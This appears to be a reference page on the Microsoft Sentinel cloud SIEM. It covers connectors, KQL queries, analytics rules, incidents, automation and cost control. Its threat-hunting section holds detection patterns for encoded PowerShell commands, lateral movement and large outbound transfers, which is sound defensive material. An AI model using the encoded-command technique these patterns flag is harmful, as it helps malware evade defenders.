Microsoft Sentinel

Microsoft Sentinel cloud SIEM — workspace configuration, analytics rules, and incident workflows.

Microsoft Sentinel

Architecture Overview

Sentinel is a cloud-native SIEM built on Azure Log Analytics. Data flows in through connectors, gets stored in Log Analytics workspace tables, and analytics rules run KQL queries on schedules to generate incidents. Automation rules and playbooks (Logic Apps) handle response.

Data Connectors  →  Log Analytics Workspace  →  Analytics Rules  →  Incidents
                         (tables)                  (KQL queries)       ↓
                                                                  Automation Rules
                                                                       ↓
                                                                  Playbooks (Logic Apps)

Data Connectors

List active data connectors via Azure CLI
az sentinel data-connector list \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --output table

Common connectors and the tables they populate:

Connector Table Data

Azure AD

SigninLogs, AuditLogs

Authentication events, directory changes

Microsoft 365

OfficeActivity

SharePoint, Exchange, Teams audit events

Microsoft Defender for Endpoint

DeviceEvents, DeviceLogonEvents

Endpoint telemetry, process creation

Syslog (CEF)

Syslog, CommonSecurityLog

Linux hosts, firewalls, network devices

Windows Security Events

SecurityEvent

Windows Event Log (logon, process, policy)

AWS CloudTrail

AWSCloudTrail

AWS API calls

Key Tables and Their Fields

SecurityEvent — Windows Security Event Log
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == 4625  // Failed logon
| project TimeGenerated, Computer, Account, LogonType, IpAddress, Activity
| take 20
SigninLogs — Azure AD authentication
SigninLogs
| where TimeGenerated > ago(24h)
| where ResultType != "0"  // Non-zero = failure
| project TimeGenerated, UserPrincipalName, AppDisplayName, IPAddress,
          ResultType, ResultDescription, Location
| take 50
AuditLogs — Azure AD directory changes
AuditLogs
| where TimeGenerated > ago(24h)
| where OperationName has "Add member to role"
| project TimeGenerated, OperationName, InitiatedBy.user.userPrincipalName,
          TargetResources[0].displayName
CommonSecurityLog — CEF events from network devices
CommonSecurityLog
| where TimeGenerated > ago(1h)
| where DeviceVendor == "Palo Alto Networks"
| where Activity == "THREAT"
| project TimeGenerated, SourceIP, DestinationIP, Activity, DeviceAction, Message
| take 20

Analytics Rules

Analytics rules are scheduled KQL queries that create incidents when results match conditions.

Create an analytics rule via Azure CLI — brute force detection
az sentinel alert-rule create \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --rule-name "Brute Force - Multiple Failed Logins" \
  --kind Scheduled \
  --query "SecurityEvent | where EventID == 4625 | summarize count() by IpAddress, bin(TimeGenerated, 5m) | where count_ > 10" \
  --query-frequency PT5M \
  --query-period PT5M \
  --severity Medium \
  --trigger-operator GreaterThan \
  --trigger-threshold 0
Common analytics rule patterns
// Brute force — 10+ failed logins from same IP in 5 minutes
SecurityEvent
| where EventID == 4625
| summarize FailureCount = count() by IpAddress, bin(TimeGenerated, 5m)
| where FailureCount >= 10

// Account added to Domain Admins
SecurityEvent
| where EventID in (4728, 4732, 4756)
| where TargetAccount has "Domain Admins"
| project TimeGenerated, SubjectAccount, TargetAccount, Computer

// Anomalous sign-in location
SigninLogs
| where ResultType == "0"
| summarize Locations = make_set(Location) by UserPrincipalName
| where array_length(Locations) > 3

Incidents

List open incidents via Azure CLI
az sentinel incident list \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --filter "properties/status eq 'New'" \
  --output table
Update incident status — assign and set to Active
az sentinel incident update \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --incident-id <incident-id> \
  --status Active \
  --owner-object-id <analyst-object-id>

Workbooks

Workbooks are interactive dashboards built on KQL queries. They visualize trends and support drill-down investigation.

Useful built-in workbooks to enable
- Azure AD Sign-in Logs          — failed logins, MFA gaps, risky sign-ins
- Security Events                — Windows event volume, anomalies
- Insecure Protocols             — NTLM, Kerberos, cleartext auth
- Threat Intelligence            — IOC matches across all data sources
- Investigation Insights         — Entity-centric investigation support

Automation Rules and Playbooks

Automation rule structure — auto-close known false positives
Trigger:    When incident is created
Condition:  Analytics rule name contains "Known Scanner IP"
Action:     Change status to Closed
            Add tag: "auto-closed"
            Classification: False Positive
Trigger a playbook (Logic App) from automation rule
Trigger:    When incident is created
Condition:  Severity == High
Action:     Run playbook "Enrich-IP-ThreatIntel"
            Run playbook "Notify-SOC-Teams-Channel"

Threat Hunting

Hunt for encoded PowerShell commands — common malware technique
SecurityEvent
| where EventID == 4688  // Process creation
| where CommandLine has_any ("-enc", "-EncodedCommand", "FromBase64String")
| project TimeGenerated, Computer, Account, Process, CommandLine
| take 50
Hunt for lateral movement — remote logons across multiple hosts
SecurityEvent
| where EventID == 4624
| where LogonType == 10  // RemoteInteractive (RDP)
| summarize TargetHosts = dcount(Computer) by Account, bin(TimeGenerated, 1h)
| where TargetHosts >= 3
Hunt for data exfiltration — large outbound transfers
CommonSecurityLog
| where DeviceAction == "allow"
| where SentBytes > 50000000  // 50 MB
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, SentBytes
| order by SentBytes desc
| take 20

Cost Management

Sentinel charges per GB of data ingested into Log Analytics. Control costs by:

1. Filter noisy log sources at the connector (don't ingest everything)
2. Use Basic Logs tier for high-volume, low-value tables (50% cheaper, limited query)
3. Set data retention per table — hot (interactive) vs archive (cheap, rehydrate to query)
4. Use commitment tiers (100, 200, 500 GB/day) for predictable discounts
5. Monitor ingestion: Usage table tracks per-table volume
Check ingestion volume by table — find the cost drivers
Usage
| where TimeGenerated > ago(30d)
| summarize TotalGB = sum(Quantity) / 1024 by DataType
| order by TotalGB desc
| take 15